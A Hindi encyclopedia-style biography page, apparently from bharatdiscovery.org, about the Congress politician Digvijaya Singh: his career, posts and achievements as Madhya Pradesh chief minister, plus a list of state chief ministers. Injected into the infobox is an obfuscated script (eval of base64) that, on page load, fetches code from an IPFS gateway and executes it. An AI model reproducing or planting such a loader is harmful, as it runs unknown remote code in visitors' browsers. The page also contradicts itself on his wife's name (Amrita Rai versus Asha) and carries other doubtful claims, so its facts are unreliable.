दिग्विजय सिंह  

दिग्विजय सिंह
पूरा नाम दिग्विजय सिंह
जन्म 28 फ़रवरी, 1947
जन्म भूमि इंदौर, मध्य प्रदेश
अभिभावक पिता- बलभद्र सिंह, माता- अपर्णा कुमारी
पति/पत्नी अमृता राय
नागरिकता भारतीय
प्रसिद्धि राजनीतिज्ञ
पार्टी भारतीय राष्ट्रीय कांग्रेस
कार्य काल भूतपूर्व मुख्यमंत्री, मध्य प्रदेश (दो बार)

प्रथम- 7 दिसंबर 1993 से 1 दिसंबर 1998 तक
द्वितीय- 1 दिसंबर 1998 से 8 दिसंबर 2003 तक

शिक्षा मैकेनिकल इंजीनियरिंग से स्नातक
विद्यालय श्री गोविन्दराम सेकसरिया प्रौद्योगिकी एवं विज्ञान संस्थान, इंदौर
अन्य जानकारी 1980 में दिग्विजय सिंह कृषि प्रबंधन, मत्स्य पालन, पशुपालन, सिंचाई और कमांड क्षेत्र के विकास मंत्रालय में कैबिनेट मंत्री बने थे।
अद्यतन‎ <script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

दिग्विजय सिंह (अंग्रेज़ी: Digvijaya Singh, जन्म- 28 फ़रवरी, 1947, इंदौर, मध्य प्रदेश) कांग्रेस से भारतीय राजनीतिज्ञ हैं। वे मध्य प्रदेश के मुख्यमंत्री भी रह चुके हैं। राजनेताओं के द्वारा उनको अक्सर 'अर्जुन सिंह' के नाम से पुकारा जाता है। 2003 विधानसभा चुनाव हारने के बाद दिग्विजय सिंह ने शपथ ली थी कि अगले 10 सालों तक वे किसी भी चुनाव में भाग नहीं लेगें। 10 सालों तक राजनीति से दूर रहने के बाद 2013 में दिग्विजय सिंह भाजपा के खिलाफ आरोपों के कारण खबरों में रहे।

परिचय

दिग्विजय सिंह का जन्म 28 फ़रवरी 1947 को मध्य प्रदेश के इंदौर में हुआ था। अपनी प्रारंभिक शिक्षा डेली कॉलेज से पूरी करने के बाद मैकेनिकल इंजीनियरिंग से स्नातक करने के लिए उन्होंने श्री गोविन्दराम सेकसरिया प्रौद्योगिकी एवं विज्ञान संस्थान, इंदौर में दाखिला लिया। दिग्विजय सिंह का विवाह आशा दिग्विजय सिंह से हुआ, इनके एक बेटा और चार बेटियाँ हैं। 28 फ़रवरी 2013 को कैंसर के कारण दिग्विजय सिंह की पत्नी का निधन हो गया था।[१]

रूचियाँ

  1. स्कूल और कॉलेज स्तर पर हॉकी, क्रिकेट और फ़ुटबॉल खेलना।
  2. मण्डल स्तर पर क्रिकेट खेलना।
  3. राष्ट्रीय स्तर पर स्कॉश खेलना।
  4. एक उत्साही वन्यजीव फोटोग्राफर।

पद

  • 1969 में राघोगढ़ नगर पालिका परिषद के अध्यक्ष चुने गए।
  • 1977, 1980 के दौरान गुना जिले के राघोगढ़ संसदीय सीट से सांसद सदस्य चुने गए।
  • 1980 में दिग्विजय सिंह कृषि प्रबंधन, मत्स्य पालन, पशुपालन, सिंचाई और कमांड क्षेत्र के विकास मंत्रालय में कैबिनेट मंत्री बने।
  • 1984, 1991 की अवधि में वे राजगढ़ से सांसद सदस्य चुने गए।
  • 1985 में वे मध्य प्रदेश कांग्रेस समिति के अध्यक्ष नियुक्त हुए।
  • 1992 मध्य प्रदेश कांग्रेस समिति के अध्यक्ष बने।
  • 1993, 1998 की अवधि में वे मध्य प्रदेश के मुख्यमंत्री बने रहे।
  • 2013 में अखिल भारतीय कांग्रेस समिति के महासचिव बने।
  • 2013-2014 के आम चुनावों के लिए राहुल गांधी की अध्यक्षता वाली समिति के सदस्य बने।[१]

उपलब्धियाँ

दिग्विजय सिंह ने गांवों के गरीब लोगों को मजबूत एवं विकसित करने के लिए सत्ता के विकेन्द्रीकरण की धारणा को प्रचलित किया, जिसके तहत 52,000 ग्राम सभाओं की स्थापना की गयी। विभिन्न गतिविधियों को संभालने के लिए ग्राम सभा के लिए आठ स्थायी समितियों का निर्माण किया गया। सत्ता के विकेन्द्रीकरण की धारणा को प्रचलित करने के लिए उनकी और उनके काम की काफी सराहना की गई। ब्रिटिश उच्चायुक्त सर रॉब यंग ने टिप्पणी की कि, "मैं मध्य प्रदेश सरकार द्वारा पंचायती राज और राजीव गांधी मिशन जैसे कार्यों से काफी प्रभावित हूँ। सत्ता के विकेन्द्रीकरण और सार्वजनिक भागीदारी के माध्यम से चल रहे कार्य सराहनीय हैं। इस बदलाव का श्रेय मुख्यमंत्री दिग्विजय सिंह को जाता है"।

दिग्विजय सिंह के मुख्यमंत्री रहते हुए मध्य प्रदेश में 26,000 से अधिक प्राथमिक विद्यालयों को स्थापित किया गया। प्रत्येक गांव में एक किलोमीटर के भीतर एक प्राथमिक विद्यालय तथा प्रत्येक तीन किलोमीटर के भीतर एक माध्यमिक विद्यालय स्थापित किया गया था। राष्ट्रीय जनगणना के अनुसार, दिग्विजय सिंह के कार्यकाल के दौरान साक्षरता दर में 20.11 प्रतिशत की बढ़ोतरी हुई थी। महिला साक्षरता के मामले में यह विकास दर 21 प्रतिशत पाई गई जबकि इसका राष्ट्रीय औसत 14 प्रतिशत था।[१]

जब दिग्विजय सिंह मुख्यमंत्री बने तो 1988-1989 में कुपोषित बच्चों का प्रतिशत (16 प्रतिशत) 2002 में कम होकर 2.92 प्रतिशत के स्तर पर आ गया था।


पन्ने की प्रगति अवस्था
आधार
प्रारम्भिक
माध्यमिक
पूर्णता
शोध

टीका टिप्पणी और संदर्भ

  1. १.० १.१ १.२ दिग्विजय सिंह के बारे में (हिंदी) elections.in। अभिगमन तिथि: 18 अक्टूबर, 2020।

संबंधित लेख

भारतीय राज्यों में पदस्थ मुख्यमंत्री
क्रमांक राज्य मुख्यमंत्री तस्वीर पार्टी पदभार ग्रहण
1. अरुणाचल प्रदेश पेमा खांडू
भाजपा 17 जुलाई, 2016
2. असम हिमंता बिस्वा सरमा
भाजपा 10 मई, 2021
3. आंध्र प्रदेश वाई एस जगनमोहन रेड्डी
वाईएसआर कांग्रेस पार्टी 30 मई, 2019
4. उत्तर प्रदेश योगी आदित्यनाथ
भाजपा 19 मार्च, 2017
5. उत्तराखण्ड पुष्कर सिंह धामी
भाजपा 4 जुलाई, 2021
6. ओडिशा नवीन पटनायक
बीजू जनता दल 5 मार्च, 2000
7. कर्नाटक सिद्धारमैया
भारतीय राष्ट्रीय कांग्रेस 20 मई, 2023
8. केरल पिनाराई विजयन
मार्क्सवादी कम्युनिस्ट पार्टी 25 मई, 2016
9. गुजरात भूपेन्द्र पटेल
भाजपा 12 सितम्बर, 2021
10. गोवा प्रमोद सावंत
भाजपा 19 मार्च, 2019
11. छत्तीसगढ़ विष्णु देव साय
भारतीय जनता पार्टी 13 दिसम्बर, 2023
12. जम्मू-कश्मीर रिक्त (राज्यपाल शासन) लागू नहीं 20 जून, 2018
13. झारखण्ड हेमन्त सोरेन
झारखंड मुक्ति मोर्चा 29 दिसम्बर, 2019
14. तमिल नाडु एम. के. स्टालिन
द्रविड़ मुन्नेत्र कड़गम 7 मई, 2021
15. त्रिपुरा माणिक साहा
भाजपा 15 मई, 2022
16. तेलंगाना अनुमुला रेवंत रेड्डी
भारतीय राष्ट्रीय काँग्रेस 7 दिसंबर, 2023
17. दिल्ली अरविन्द केजरीवाल
आप 14 फ़रवरी, 2015
18. नागालैण्ड नेफियू रियो
एनडीपीपी 8 मार्च, 2018
19. पंजाब भगवंत मान
आम आदमी पार्टी 16 मार्च, 2022
20. पश्चिम बंगाल ममता बनर्जी
तृणमूल कांग्रेस 20 मई, 2011
21. पुदुचेरी एन. रंगास्वामी
कांग्रेस 7 मई, 2021
22. बिहार नितीश कुमार
जदयू 27 जुलाई, 2017
23. मणिपुर एन. बीरेन सिंह
भाजपा 15 मार्च, 2017
24. मध्य प्रदेश मोहन यादव
भाजपा 13 दिसंबर, 2023
25. महाराष्ट्र एकनाथ शिंदे
शिव सेना 30 जून, 2022
26. मिज़ोरम लालदुहोमा
जोरम पीपल्स मूवमेंट 8 दिसम्बर, 2023
27. मेघालय कॉनराड संगमा
एनपीपी 6 मार्च, 2018
28. राजस्थान भजन लाल शर्मा
भारतीय जनता पार्टी 15 दिसम्बर, 2023
29. सिक्किम प्रेम सिंह तमांग
सिक्किम क्रांतिकारी मोर्चा 27 मई, 2019
30. हरियाणा नायब सिंह सैनी
भाजपा 12 मार्च, 2024
31. हिमाचल प्रदेश सुखविंदर सिंह सुक्खू
भारतीय राष्ट्रीय कांग्रेस 11 दिसम्बर, 2022

वर्णमाला क्रमानुसार लेख खोज

                              अं                                                                                                       क्ष    त्र    ज्ञ             श्र   अः



"https://amp.bharatdiscovery.org/w/index.php?title=दिग्विजय_सिंह&oldid=651322" से लिया गया